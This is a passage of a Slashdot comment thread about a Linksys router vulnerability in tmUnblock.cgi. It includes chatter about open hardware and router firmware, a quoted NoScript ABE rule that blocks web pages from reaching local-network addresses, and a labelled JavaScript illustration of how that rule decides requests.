    The current issue about open source / the open idea about hardware as it sits is the programmers and the hardware enthusiast although it can be put the other way around many times, it can be just with people with an idea about software which can come up with an awesome design but before you know it is a hardware platform with many characteristics, look at the Raspberry Pi and Gumstix projects, an idea to bring people to the idea of micro electronics which has been a long time where people could even think about even touching this type of platform without dropping a large sum of money but with the current rate of technology we are able to achieve what we haven't been able to do in the past. The thing about hardware is that many corporations would not like to know who you are but to profit from every little thing you might come up with but that can be anyone, i.e. the IT Crowd HaHa, Linksys Router 54 G after it was yes hacked and yes ripped apart then rebuilt again using open source code it became a very useful and powerful piece of hardware for the masses.

  37. Belkin owns Linksys now by Anonymous Coward · · Score: 0

    Need to catch up with the times. Linksys is now a Belkin product line....

  38. Agreed by Anonymous Coward · · Score: 0

    It was certainly clever for a 14-year-old.

  39. re by Anonymous Coward · · Score: 0

    "Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore."

    I sort of didn't believe you so I looked it up. That is priceless.

  40. Not quite the case... by Millennium · · Score: 1

    Even if we limit our scope to routers-as-initially-purchased, there's still one stock model that runs Linux out of the box: the WRT54GL. It was made after Linksys otherwise switched to VxWorks, in an attempt to keep a hand in the Linux market.

    I've got one. I flashed it with Tomato, but it definitely came with Linux on it.

  41. Didn't they use a web based settings system by Anonymous Coward · · Score: 0

    I seem to remember Linksys Routers using a web based settings system for users. The access was done through a web based menu. Not sure if this is how the exploit works? But I know at the time, many users were upset about the web access security issues that may come up.
    Personally, I have not been real impressed with any router maker as they do not set their GUI and firmware up very well these days. Maybe because so much emphasis is placed on features and more settings that these systems are becoming more vulnerable.

  42. But what about my Mac?? by bananahead · · Score: 1

    But, but, but, do I need antivirus for my Mac?? (wait for it).... NO, Macs don't get viruses!!!! (this has little to do with the actual topic here, just trying to add to the hysteria)

    --
    A most overlooked advantage to owning a computer is if they foul up there's no law against whacking them around a bit.
  43. NoScript ABE for the win by Candyman_JAC · · Score: 1

    NoScript in Firefox provides an Application Boundary Enforcer with a rule to block access to local resources from the WAN. The rule looks like this:

    # This one guards the local network, like LocalRodeo
    # LOCAL is a placeholder which matches all the LAN
    # subnets (possibly configurable) and localhost
    Site LOCAL
    Accept from LOCAL
    Deny

    I have not tested, but I think this will prevent a malicious website from exploiting this vulnerability
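
The decision logic of the rule quoted in the comment above, as an added example that is not part of the original post and is not NoScript's own code. It assumes LOCAL means `localhost` plus IPv4 literals in the loopback, RFC 1918 and link-local ranges; the function names and sample URLs are constructed for illustration.

```javascript
// Simplified model of the ABE rule:  Site LOCAL / Accept from LOCAL / Deny
// Assumption: LOCAL = "localhost" plus IPv4 literals in the ranges below.
// Hostnames that merely resolve to such addresses are not handled here.
const LOCAL_RANGES = [
  ["127.0.0.0", 8], ["10.0.0.0", 8], ["172.16.0.0", 12],
  ["192.168.0.0", 16], ["169.254.0.0", 16],
];

// Convert a dotted-quad string to a number, or null if it is not one.
function ipv4ToInt(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const octets = m.slice(1).map(Number);
  if (octets.some((o) => o > 255)) return null;
  return octets.reduce((acc, o) => acc * 256 + o, 0);
}

function isLocal(host) {
  if (host === "localhost") return true;
  const ip = ipv4ToInt(host);
  if (ip === null) return false;
  return LOCAL_RANGES.some(([base, bits]) => {
    const start = ipv4ToInt(base);
    return ip >= start && ip < start + 2 ** (32 - bits);
  });
}

// originUrl: page that triggered the request; targetUrl: resource requested.
function abeDecision(originUrl, targetUrl) {
  const target = new URL(targetUrl).hostname;
  if (!isLocal(target)) return "NOT_APPLICABLE"; // rule only guards "Site LOCAL"
  const origin = new URL(originUrl).hostname;
  return isLocal(origin) ? "ACCEPT" : "DENY";    // "Accept from LOCAL", else "Deny"
}

// Constructed sample requests (not captured traffic).
const samples = [
  ["http://news.example/story.html", "http://192.168.1.1/status"],
  ["http://192.168.1.1/index.html", "http://192.168.1.1/status"],
  ["http://news.example/story.html", "http://cdn.example/logo.png"],
];
for (const [from, to] of samples) {
  console.log(`${from} -> ${to}: ${abeDecision(from, to)}`);
}
```

The first sample is the cross-boundary case the rule exists for: a page on a public site requesting a LAN address is denied, while the router's own admin pages can still load their resources.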

  44. Re:raymorris: the 'great gov't coder' (lol, not) by Anonymous Coward · · Score: 0
  45. Re:raymorris: the 'great gov't coder' (lol, not) by Anonymous Coward · · Score: 0

    raymorris, quit playing jailhouse lawyer by ac http://news.slashdot.org/comme...

  46. Redirected to beta from RSS by Anonymous Coward · · Score: 0

    How do I get off the beta page?

    1. Re:Redirected to beta from RSS by crutchy · · Score: 1

      try clicking the X in the top right corner of the browser window

      or change the URL from beta.slashdot.org to www.slashdot.org

      if you're on a mobile, not sure... you may be stuffed there, but slashdot has always been pretty shit on a mobile

  47. Don't lie! by Anonymous Coward · · Score: 0

    Skynet, is that you?

    1. Re:Don't lie! by BronsCon · · Score: 1

      Why, oh why do I keep coming here?

      That's right, shit like this.

      Thanks :)

      --
      APK quotes people (including myself) without context and should not be trusted. Just thought you should know.
  48. Linux =/= whole firmware by Anonymous Coward · · Score: 0

    Linux is open source, but Linksys' firmware isn't. And this exploit resides in tmUnblock.cgi, which is part of the firmware, not the kernel. Simple as that.